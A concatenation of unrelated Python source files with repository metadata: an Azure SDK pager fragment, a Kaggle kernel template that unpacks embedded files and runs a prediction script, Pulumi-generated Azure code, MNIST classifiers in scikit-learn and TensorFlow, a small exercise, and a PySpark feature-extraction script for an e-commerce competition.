url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ExpressRoutePortListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ExpressRoutePorts'} # type: ignore
| [
"[email protected]"
] | |
832aa0d3c90861062ce69cb90cf22a074676b793 | 0e2994b2b6ffe318081274eff6425573f1ab953e | /argus-freesound-master/stacking_kernel_template.py | 5872f6d63621c45783150d2611f315b29cf299b0 | [
"MIT"
] | permissive | Ramstein/castme-transform-prediction-via-adversarial-network | 4f6b1f3c953c9686ca2a77aef27891089e9a687e | 361369fcb75f7c90b3e276d88e547cbba3402ea6 | refs/heads/master | 2023-07-15T14:12:18.842595 | 2021-09-07T18:08:01 | 2021-09-07T18:08:01 | 404,077,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 579 | py | import gzip
import base64
import os
from pathlib import Path
from typing import Dict
KERNEL_MODE = "predict"
# this is base64 encoded source code
file_data: Dict = {file_data}
for path, encoded in file_data.items():
print(path)
path = Path(path)
path.parent.mkdir(parents=True, exist_ok=True)
path.write_bytes(gzip.decompress(base64.b64decode(encoded)))
def run(command):
os.system('export PYTHONPATH=${PYTHONPATH}:/kaggle/working && '
f'export MODE={KERNEL_MODE} && ' + command)
run('python stacking_predict.py')
run('rm -rf argus src')
| [
"[email protected]"
] | |
68ae86fec143f3d1ab7439e4b15616b2622f4aff | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/automation/v20190601/get_watcher.py | 3f148594cb31117a933d696388865eb5b54a5b0e | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,247 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetWatcherResult',
'AwaitableGetWatcherResult',
'get_watcher',
]
@pulumi.output_type
class GetWatcherResult:
"""
Definition of the watcher type.
"""
def __init__(__self__, creation_time=None, description=None, etag=None, execution_frequency_in_seconds=None, id=None, last_modified_by=None, last_modified_time=None, location=None, name=None, script_name=None, script_parameters=None, script_run_on=None, status=None, tags=None, type=None):
if creation_time and not isinstance(creation_time, str):
raise TypeError("Expected argument 'creation_time' to be a str")
pulumi.set(__self__, "creation_time", creation_time)
if description and not isinstance(description, str):
raise TypeError("Expected argument 'description' to be a str")
pulumi.set(__self__, "description", description)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if execution_frequency_in_seconds and not isinstance(execution_frequency_in_seconds, float):
raise TypeError("Expected argument 'execution_frequency_in_seconds' to be a float")
pulumi.set(__self__, "execution_frequency_in_seconds", execution_frequency_in_seconds)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if last_modified_by and not isinstance(last_modified_by, str):
raise TypeError("Expected argument 'last_modified_by' to be a str")
pulumi.set(__self__, "last_modified_by", last_modified_by)
if last_modified_time and not isinstance(last_modified_time, str):
raise TypeError("Expected argument 'last_modified_time' to be a str")
pulumi.set(__self__, "last_modified_time", last_modified_time)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if script_name and not isinstance(script_name, str):
raise TypeError("Expected argument 'script_name' to be a str")
pulumi.set(__self__, "script_name", script_name)
if script_parameters and not isinstance(script_parameters, dict):
raise TypeError("Expected argument 'script_parameters' to be a dict")
pulumi.set(__self__, "script_parameters", script_parameters)
if script_run_on and not isinstance(script_run_on, str):
raise TypeError("Expected argument 'script_run_on' to be a str")
pulumi.set(__self__, "script_run_on", script_run_on)
if status and not isinstance(status, str):
raise TypeError("Expected argument 'status' to be a str")
pulumi.set(__self__, "status", status)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> str:
"""
Gets or sets the creation time.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
Gets or sets the description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def etag(self) -> Optional[str]:
"""
Gets or sets the etag of the resource.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="executionFrequencyInSeconds")
def execution_frequency_in_seconds(self) -> Optional[float]:
"""
Gets or sets the frequency at which the watcher is invoked.
"""
return pulumi.get(self, "execution_frequency_in_seconds")
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified resource Id for the resource
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="lastModifiedBy")
def last_modified_by(self) -> str:
"""
Details of the user who last modified the watcher.
"""
return pulumi.get(self, "last_modified_by")
@property
@pulumi.getter(name="lastModifiedTime")
def last_modified_time(self) -> str:
"""
Gets or sets the last modified time.
"""
return pulumi.get(self, "last_modified_time")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="scriptName")
def script_name(self) -> Optional[str]:
"""
Gets or sets the name of the script the watcher is attached to, i.e. the name of an existing runbook.
"""
return pulumi.get(self, "script_name")
@property
@pulumi.getter(name="scriptParameters")
def script_parameters(self) -> Optional[Mapping[str, str]]:
"""
Gets or sets the parameters of the script.
"""
return pulumi.get(self, "script_parameters")
@property
@pulumi.getter(name="scriptRunOn")
def script_run_on(self) -> Optional[str]:
"""
Gets or sets the name of the hybrid worker group the watcher will run on.
"""
return pulumi.get(self, "script_run_on")
@property
@pulumi.getter
def status(self) -> str:
"""
Gets the current status of the watcher.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
class AwaitableGetWatcherResult(GetWatcherResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWatcherResult(
creation_time=self.creation_time,
description=self.description,
etag=self.etag,
execution_frequency_in_seconds=self.execution_frequency_in_seconds,
id=self.id,
last_modified_by=self.last_modified_by,
last_modified_time=self.last_modified_time,
location=self.location,
name=self.name,
script_name=self.script_name,
script_parameters=self.script_parameters,
script_run_on=self.script_run_on,
status=self.status,
tags=self.tags,
type=self.type)
def get_watcher(automation_account_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
watcher_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWatcherResult:
"""
Definition of the watcher type.
:param str automation_account_name: The name of the automation account.
:param str resource_group_name: Name of an Azure Resource group.
:param str watcher_name: The watcher name.
"""
__args__ = dict()
__args__['automationAccountName'] = automation_account_name
__args__['resourceGroupName'] = resource_group_name
__args__['watcherName'] = watcher_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:automation/v20190601:getWatcher', __args__, opts=opts, typ=GetWatcherResult).value
return AwaitableGetWatcherResult(
creation_time=__ret__.creation_time,
description=__ret__.description,
etag=__ret__.etag,
execution_frequency_in_seconds=__ret__.execution_frequency_in_seconds,
id=__ret__.id,
last_modified_by=__ret__.last_modified_by,
last_modified_time=__ret__.last_modified_time,
location=__ret__.location,
name=__ret__.name,
script_name=__ret__.script_name,
script_parameters=__ret__.script_parameters,
script_run_on=__ret__.script_run_on,
status=__ret__.status,
tags=__ret__.tags,
type=__ret__.type)
| [
"[email protected]"
] | |
2f1de19f501102cdfb600897d1579f3d81ec4fa5 | e376eb34db5eaf17608f2ebf22ecd796b836a7b1 | /HW2/test-svm.py | 8d0329207c8d1943a577aa163eee04f3156d8646 | [] | no_license | yshsu0918/MachineLearning2020 | 5b8babad41d9d377d0ccf33b4b4a1c4e6e572bfa | f953492ae85941d81f675eaa21daf8fadfa227b3 | refs/heads/master | 2023-02-11T18:44:11.319760 | 2020-12-25T03:53:49 | 2020-12-25T03:53:49 | 324,283,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,837 | py | from sklearn import svm
import numpy as np
import struct
import time
def decode_idx3_ubyte(idx3_ubyte_file,dataset_size):
f = open(idx3_ubyte_file, 'rb').read()
mem_offset = 16
images = []
for i in range(dataset_size):
if (i+1) % (dataset_size/100) == 0:
print('#', end='')
images.append( np.array(struct.unpack_from('>784B', f, mem_offset)).reshape((28, 28)))
mem_offset += (784)
return images
def decode_idx1_ubyte(idx1_ubyte_file,dataset_size):
f = open(idx1_ubyte_file, 'rb').read()
mem_offset = 8
labels = []
for i in range(dataset_size):
if (i+1) % (dataset_size/100) == 0:
print('#', end='')
labels.append( struct.unpack_from('>B', f, mem_offset)[0] )
mem_offset += 1
return labels
train_image = decode_idx3_ubyte('train-images.idx3-ubyte',60000)
train_label = decode_idx1_ubyte('train-labels.idx1-ubyte',60000)
print('load train done')
test_image = decode_idx3_ubyte('t10k-images.idx3-ubyte',10000)
test_label = decode_idx1_ubyte('t10k-labels.idx1-ubyte',10000)
print('load test done')
#mnist = input_data.read_data_sets('MNIST_data', one_hot=False)
train_num = 60000
test_num = 10000
x_train = [ x.reshape(28*28) for x in train_image]
y_train = train_label
x_test = [ x.reshape(28*28) for x in test_image]
y_test = test_label
tStart = time.time()
# 獲取一個支援向量機模型
print('1')
predictor = svm.SVC(kernel='linear', verbose=True, max_iter = 1000)
# 把資料丟進去
print('2')
predictor.fit(x_train[:train_num], y_train[:train_num])
# 預測結果
print('3')
result = predictor.predict(x_test[:test_num])
# 準確率估計
print('4')
accurancy = np.sum(np.equal(result, y_test[:test_num])) / test_num
print(accurancy)
tEnd = time.time()
print('SVM use {} seconds'.format(tEnd - tStart))
| [
"[email protected]"
] | |
e2b0b5ef7fb05b0a4d43e6017bc2c9ecf30e1916 | 999879f8d18e041d7fa313132408b252aded47f8 | /01-codes/tensorflow-master/tensorflow/models/image/mnist/convolutional.py | d6155ad11efb1506a56e91e926a91ac6ac296029 | [
"Apache-2.0",
"MIT"
] | permissive | QPanProjects/Surrogate-Model | ebcaf05728e82dcbcd924c2edca1b490ab085173 | 848c7128201218b0819c9665e2cec72e3b1d29ac | refs/heads/master | 2022-10-11T19:03:55.224257 | 2020-06-09T14:37:35 | 2020-06-09T14:37:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,852 | py | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple, end-to-end, LeNet-5-like convolutional MNIST model example.
This should achieve a test error of 0.7%. Please keep this model as simple and
linear as possible, it is meant as a tutorial for simple convolutional models.
Run with --self_test on the command line to execute a short self-test.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import sys
import time
import numpy
import tensorflow as tf
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
SOURCE_URL = 'http://yann.lecun.com/exdb/mnist/'
WORK_DIRECTORY = 'data'
IMAGE_SIZE = 28
NUM_CHANNELS = 1
PIXEL_DEPTH = 255
NUM_LABELS = 10
VALIDATION_SIZE = 5000 # Size of the validation set.
SEED = 66478 # Set to None for random seed.
BATCH_SIZE = 64
NUM_EPOCHS = 10
EVAL_BATCH_SIZE = 64
EVAL_FREQUENCY = 100 # Number of steps between evaluations.
tf.app.flags.DEFINE_boolean("self_test", False, "True if running a self test.")
FLAGS = tf.app.flags.FLAGS
def maybe_download(filename):
"""Download the data from Yann's web, unless it's already here."""
if not tf.gfile.Exists(WORK_DIRECTORY):
tf.gfile.MakeDirs(WORK_DIRECTORY)
filepath = os.path.join(WORK_DIRECTORY, filename)
if not tf.gfile.Exists(filepath):
filepath, _ = urllib.request.urlretrieve(SOURCE_URL + filename, filepath)
with tf.gfile.GFile(filepath) as f:
size = f.Size()
print('Successfully downloaded', filename, size, 'bytes.')
return filepath
def extract_data(filename, num_images):
"""Extract the images into a 4D tensor [image index, y, x, channels].
Values are rescaled from [0, 255] down to [-0.5, 0.5].
"""
print('Extracting', filename)
with gzip.open(filename) as bytestream:
bytestream.read(16)
buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images)
data = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)
data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH
data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, 1)
return data
def extract_labels(filename, num_images):
"""Extract the labels into a vector of int64 label IDs."""
print('Extracting', filename)
with gzip.open(filename) as bytestream:
bytestream.read(8)
buf = bytestream.read(1 * num_images)
labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)
return labels
def fake_data(num_images):
"""Generate a fake dataset that matches the dimensions of MNIST."""
data = numpy.ndarray(
shape=(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS),
dtype=numpy.float32)
labels = numpy.zeros(shape=(num_images,), dtype=numpy.int64)
for image in xrange(num_images):
label = image % 2
data[image, :, :, 0] = label - 0.5
labels[image] = label
return data, labels
def error_rate(predictions, labels):
"""Return the error rate based on dense predictions and sparse labels."""
return 100.0 - (
100.0 *
numpy.sum(numpy.argmax(predictions, 1) == labels) /
predictions.shape[0])
def main(argv=None): # pylint: disable=unused-argument
if FLAGS.self_test:
print('Running self-test.')
train_data, train_labels = fake_data(256)
validation_data, validation_labels = fake_data(EVAL_BATCH_SIZE)
test_data, test_labels = fake_data(EVAL_BATCH_SIZE)
num_epochs = 1
else:
# Get the data.
train_data_filename = maybe_download('train-images-idx3-ubyte.gz')
train_labels_filename = maybe_download('train-labels-idx1-ubyte.gz')
test_data_filename = maybe_download('t10k-images-idx3-ubyte.gz')
test_labels_filename = maybe_download('t10k-labels-idx1-ubyte.gz')
# Extract it into numpy arrays.
train_data = extract_data(train_data_filename, 60000)
train_labels = extract_labels(train_labels_filename, 60000)
test_data = extract_data(test_data_filename, 10000)
test_labels = extract_labels(test_labels_filename, 10000)
# Generate a validation set.
validation_data = train_data[:VALIDATION_SIZE, ...]
validation_labels = train_labels[:VALIDATION_SIZE]
train_data = train_data[VALIDATION_SIZE:, ...]
train_labels = train_labels[VALIDATION_SIZE:]
num_epochs = NUM_EPOCHS
train_size = train_labels.shape[0]
# This is where training samples and labels are fed to the graph.
# These placeholder nodes will be fed a batch of training data at each
# training step using the {feed_dict} argument to the Run() call below.
train_data_node = tf.placeholder(
tf.float32,
shape=(BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))
train_labels_node = tf.placeholder(tf.int64, shape=(BATCH_SIZE,))
eval_data = tf.placeholder(
tf.float32,
shape=(EVAL_BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))
# The variables below hold all the trainable weights. They are passed an
# initial value which will be assigned when when we call:
# {tf.initialize_all_variables().run()}
conv1_weights = tf.Variable(
tf.truncated_normal([5, 5, NUM_CHANNELS, 32], # 5x5 filter, depth 32.
stddev=0.1,
seed=SEED))
conv1_biases = tf.Variable(tf.zeros([32]))
conv2_weights = tf.Variable(
tf.truncated_normal([5, 5, 32, 64],
stddev=0.1,
seed=SEED))
conv2_biases = tf.Variable(tf.constant(0.1, shape=[64]))
fc1_weights = tf.Variable( # fully connected, depth 512.
tf.truncated_normal(
[IMAGE_SIZE // 4 * IMAGE_SIZE // 4 * 64, 512],
stddev=0.1,
seed=SEED))
fc1_biases = tf.Variable(tf.constant(0.1, shape=[512]))
fc2_weights = tf.Variable(
tf.truncated_normal([512, NUM_LABELS],
stddev=0.1,
seed=SEED))
fc2_biases = tf.Variable(tf.constant(0.1, shape=[NUM_LABELS]))
# We will replicate the model structure for the training subgraph, as well
# as the evaluation subgraphs, while sharing the trainable parameters.
def model(data, train=False):
"""The Model definition."""
# 2D convolution, with 'SAME' padding (i.e. the output feature map has
# the same size as the input). Note that {strides} is a 4D array whose
# shape matches the data layout: [image index, y, x, depth].
conv = tf.nn.conv2d(data,
conv1_weights,
strides=[1, 1, 1, 1],
padding='SAME')
# Bias and rectified linear non-linearity.
relu = tf.nn.relu(tf.nn.bias_add(conv, conv1_biases))
# Max pooling. The kernel size spec {ksize} also follows the layout of
# the data. Here we have a pooling window of 2, and a stride of 2.
pool = tf.nn.max_pool(relu,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
conv = tf.nn.conv2d(pool,
conv2_weights,
strides=[1, 1, 1, 1],
padding='SAME')
relu = tf.nn.relu(tf.nn.bias_add(conv, conv2_biases))
pool = tf.nn.max_pool(relu,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
# Reshape the feature map cuboid into a 2D matrix to feed it to the
# fully connected layers.
pool_shape = pool.get_shape().as_list()
reshape = tf.reshape(
pool,
[pool_shape[0], pool_shape[1] * pool_shape[2] * pool_shape[3]])
# Fully connected layer. Note that the '+' operation automatically
# broadcasts the biases.
hidden = tf.nn.relu(tf.matmul(reshape, fc1_weights) + fc1_biases)
# Add a 50% dropout during training only. Dropout also scales
# activations such that no rescaling is needed at evaluation time.
if train:
hidden = tf.nn.dropout(hidden, 0.5, seed=SEED)
return tf.matmul(hidden, fc2_weights) + fc2_biases
# Training computation: logits + cross-entropy loss.
logits = model(train_data_node, True)
loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits, train_labels_node))
# L2 regularization for the fully connected parameters.
regularizers = (tf.nn.l2_loss(fc1_weights) + tf.nn.l2_loss(fc1_biases) +
tf.nn.l2_loss(fc2_weights) + tf.nn.l2_loss(fc2_biases))
# Add the regularization term to the loss.
loss += 5e-4 * regularizers
# Optimizer: set up a variable that's incremented once per batch and
# controls the learning rate decay.
batch = tf.Variable(0)
# Decay once per epoch, using an exponential schedule starting at 0.01.
learning_rate = tf.train.exponential_decay(
0.01, # Base learning rate.
batch * BATCH_SIZE, # Current index into the dataset.
train_size, # Decay step.
0.95, # Decay rate.
staircase=True)
# Use simple momentum for the optimization.
optimizer = tf.train.MomentumOptimizer(learning_rate,
0.9).minimize(loss,
global_step=batch)
# Predictions for the current training minibatch.
train_prediction = tf.nn.softmax(logits)
# Predictions for the test and validation, which we'll compute less often.
eval_prediction = tf.nn.softmax(model(eval_data))
# Small utility function to evaluate a dataset by feeding batches of data to
# {eval_data} and pulling the results from {eval_predictions}.
# Saves memory and enables this to run on smaller GPUs.
def eval_in_batches(data, sess):
"""Get all predictions for a dataset by running it in small batches."""
size = data.shape[0]
if size < EVAL_BATCH_SIZE:
raise ValueError("batch size for evals larger than dataset: %d" % size)
predictions = numpy.ndarray(shape=(size, NUM_LABELS), dtype=numpy.float32)
for begin in xrange(0, size, EVAL_BATCH_SIZE):
end = begin + EVAL_BATCH_SIZE
if end <= size:
predictions[begin:end, :] = sess.run(
eval_prediction,
feed_dict={eval_data: data[begin:end, ...]})
else:
batch_predictions = sess.run(
eval_prediction,
feed_dict={eval_data: data[-EVAL_BATCH_SIZE:, ...]})
predictions[begin:, :] = batch_predictions[begin - size:, :]
return predictions
# Create a local session to run the training.
start_time = time.time()
with tf.Session() as sess:
# Run all the initializers to prepare the trainable parameters.
tf.initialize_all_variables().run()
print('Initialized!')
# Loop through training steps.
for step in xrange(int(num_epochs * train_size) // BATCH_SIZE):
# Compute the offset of the current minibatch in the data.
# Note that we could use better randomization across epochs.
offset = (step * BATCH_SIZE) % (train_size - BATCH_SIZE)
batch_data = train_data[offset:(offset + BATCH_SIZE), ...]
batch_labels = train_labels[offset:(offset + BATCH_SIZE)]
# This dictionary maps the batch data (as a numpy array) to the
# node in the graph is should be fed to.
feed_dict = {train_data_node: batch_data,
train_labels_node: batch_labels}
# Run the graph and fetch some of the nodes.
_, l, lr, predictions = sess.run(
[optimizer, loss, learning_rate, train_prediction],
feed_dict=feed_dict)
if step % EVAL_FREQUENCY == 0:
elapsed_time = time.time() - start_time
start_time = time.time()
print('Step %d (epoch %.2f), %.1f ms' %
(step, float(step) * BATCH_SIZE / train_size,
1000 * elapsed_time / EVAL_FREQUENCY))
print('Minibatch loss: %.3f, learning rate: %.6f' % (l, lr))
print('Minibatch error: %.1f%%' % error_rate(predictions, batch_labels))
print('Validation error: %.1f%%' % error_rate(
eval_in_batches(validation_data, sess), validation_labels))
sys.stdout.flush()
# Finally print the result!
test_error = error_rate(eval_in_batches(test_data, sess), test_labels)
print('Test error: %.1f%%' % test_error)
if FLAGS.self_test:
print('test_error', test_error)
assert test_error == 0.0, 'expected 0.0 test_error, got %.2f' % (
test_error,)
if __name__ == '__main__':
tf.app.run()
| [
"[email protected]"
] | |
94c91fe04ff2fb9e620aad0f6abe11b5811ef1f6 | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/226/users/4163/codes/1638_652.py | e5d5e8c43e0924df933804cc45da791a860f0cfb | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | a= int(input("insira um numero de 3 dgts: "))
b = a//100
c = a%100
x = (a%c)
if x==0:
print("SIM")
else:
print("NAO") | [
"[email protected]"
] | |
6b04c699eb03528f3243f106a6d49ded0dc8d86a | cda0f7f4e9e19aeb03148b71b9e4ac924a4b4814 | /onspark_generate_feature_user.py | ca86b74cb9b58f4ddeff0f30aece89b7ac8ba727 | [] | no_license | 00fq00/competition_tianchi | 32a4f59340d96955d8056daa5fe67d6079c36f8e | fb45aaa412ddba5b69555ecfd75c3aa462fe2489 | refs/heads/master | 2021-01-19T21:12:41.887958 | 2017-03-03T09:00:27 | 2017-03-03T09:00:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,331 | py | # -*- coding: utf-8 -*-
import sys
from operator import add
from pyspark import SparkConf
from pyspark import SparkContext
from sklearn.svm import SVC
from sklearn.svm import LinearSVC
from sklearn.pipeline import Pipeline
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
####################################################################################
############################ 用户特征 ############################
####################################################################################
def extract1(line):
import time
(uid, iid, ict) = line.strip().split("\t")[0].split(" ")
items = filter(lambda x:x[0]>0, [(int(time.mktime(time.strptime('2014-'+etime,'%Y-%m-%d-%H'))-time.mktime(time.strptime('2014-'+i.split(",")[0],'%Y-%m-%d-%H')))/(24*3600)+1, int(i.split(",")[1])) for i in line.strip().split("\t")[1].split(" ")])
return (uid,items)
def extract2(items_list):
import itertools
items, items_buy, items_buy_3, f, inf = [], [], [], [0]*39, 100
f[32] = len(items_list) # 交互商品数
for i in items_list:
if len(filter(lambda x:x[1]==4,i))>0:
items_buy.append(i)
if len(filter(lambda x:x[1]==4 and x[0]<=3,i))>0:
items_buy_3.append(i)
items.extend(i)
f[33] = len(items_buy) # 购买商品数
f[34] = len(items_buy_3) # 三天内购买商品数
f[35] = len(filter(lambda x:len(x)==1,items_list)) # 只有过一次交互的商品数
f[36] = len(filter(lambda x:len(x)==2,items_list)) # 有过两次交互的商品数
f[37] = len(filter(lambda x:len(x)==3,items_list)) # 有过三次交互的商品数
items = sorted(items, key=lambda x:x[0], reverse=True)
buy = filter(lambda x:x[1]==4, items)
last = buy[-1][0] if len(buy)!=0 else inf
f[24] = len(filter(lambda x:x[0]<=1 and x[1]==1, items)) # 最后1天点击次数
f[25] = len(filter(lambda x:x[0]<=1 and x[1]==2, items)) # 最后1天加收次数
f[26] = len(filter(lambda x:x[0]<=1 and x[1]==3, items)) # 最后1天加购次数
f[27] = len(filter(lambda x:x[0]<=1 and x[1]==4, items)) # 最后1天购买次数
f[28] = len(filter(lambda x:x[0]<=3 and x[1]==1, items)) # 最后3天点击次数
f[29] = len(filter(lambda x:x[0]<=3 and x[1]==2, items)) # 最后3天加收次数
f[30] = len(filter(lambda x:x[0]<=3 and x[1]==3, items)) # 最后3天加购次数
f[31] = len(filter(lambda x:x[0]<=3 and x[1]==4, items)) # 最后3天购买次数
f[0] = len(filter(lambda x:x[0]<=7 and x[1]==1, items)) # 最后1周点击次数
f[1] = len(filter(lambda x:x[0]<=7 and x[1]==2, items)) # 最后1周加收次数
f[2] = len(filter(lambda x:x[0]<=7 and x[1]==3, items)) # 最后1周加购次数
f[3] = len(filter(lambda x:x[0]<=7 and x[1]==4, items)) # 最后1周购买次数
f[4] = len(filter(lambda x:x[0]<=21 and x[1]==1, items)) # 最后3周点击次数
f[5] = len(filter(lambda x:x[0]<=21 and x[1]==2, items)) # 最后3周加收次数
f[6] = len(filter(lambda x:x[0]<=21 and x[1]==3, items)) # 最后3周加购次数
f[7] = len(filter(lambda x:x[0]<=21 and x[1]==4, items)) # 最后3周购买次数
f[8] = min(1.0,round(1.0*f[3]/f[0],4)) if f[0]!=0 else 0.0 # 最后1周点击转化率
f[9] = min(1.0,round(1.0*f[3]/f[1],4)) if f[1]!=0 else 0.0 # 最后1周加收转化率
f[10] = min(1.0,round(1.0*f[3]/f[2],4)) if f[2]!=0 else 0.0 # 最后1周加购转化率
f[11] = min(1.0,round(1.0*f[7]/f[4],4)) if f[4]!=0 else 0.0 # 最后3周点击转化率
f[12] = min(1.0,round(1.0*f[7]/f[5],4)) if f[5]!=0 else 0.0 # 最后3周加收转化率
f[13] = min(1.0,round(1.0*f[7]/f[6],4)) if f[6]!=0 else 0.0 # 最后3周加购转化率
f[14] = last # 最后一次购买距离天数
f[15] = len(set([item[0] for item in items if item[0]<=3])) # 最后3天内交互天数
f[16] = len(set([item[0] for item in items if item[0]<=7])) # 最后1周内交互天数
f[17] = len(set([item[0] for item in items if item[0]<=21])) # 最后3周内交互天数
f[18] = items[-1][0] if len(items)!=0 else inf # 最后1次交互距离天数
inter = [len(list(i)) for _,i in itertools.groupby(items, lambda x: x[0])]
f[19] = len(inter) #交互天数
f[20] = max(inter) if len(inter)!=0 else 0 #交互最多的一天交互次数
f[21] = len(filter(lambda x:x[0]<=1 and x[1]==4, items)) # 最后1天购买次数
f[22] = len(filter(lambda x:x[0]<=3 and x[1]==4, items)) # 最后3天购买次数
f[23] = len(filter(lambda x:x[0]<=7 and x[1]==4, items)) # 最后7天购买次数
f[38] = round(1.0*len(items)/f[32],4) if f[32]!=0 else 0.0 # 用户对每件商品的平均交互次数
return "\t".join([str(i) for i in f])
global etime
global subset
if __name__ == "__main__":
import fileinput
conf = (SparkConf()
.setMaster("spark://namenode.omnilab.sjtu.edu.cn:7077")
.setAppName("Extract")
.set("spark.cores.max", "32")
.set("spark.driver.memory", "4g")
.set("spark.executor.memory", "6g"))
sc = SparkContext(conf = conf)
lines = sc.textFile('hdfs://namenode.omnilab.sjtu.edu.cn/user/qiangsiwei/competition_tianchi/uid_iid', 1)
target, etime, subset = "12-19-0", "12-18-23", {}
# target, etime, subset = "12-18-0", "12-17-23", {}
# target, etime, subset = "12-17-0", "12-16-23", {}
# target, etime, subset = "12-16-0", "12-15-23", {}
# target, etime, subset = "12-15-0", "12-14-23", {}
# target, etime, subset = "12-14-0", "12-13-23", {}
# target, etime, subset = "12-13-0", "12-12-23", {}
# target, etime, subset = "12-12-0", "12-11-23", {}
# target, etime, subset = "12-11-0", "12-10-23", {}
# target, etime, subset = "12-10-0", "12-09-23", {}
# target, etime, subset = "12-09-0", "12-08-23", {}
# target, etime, subset = "12-08-0", "12-07-23", {}
# target, etime, subset = "12-07-0", "12-06-23", {}
# target, etime, subset = "12-06-0", "12-05-23", {}
# target, etime, subset = "12-05-0", "12-04-23", {}
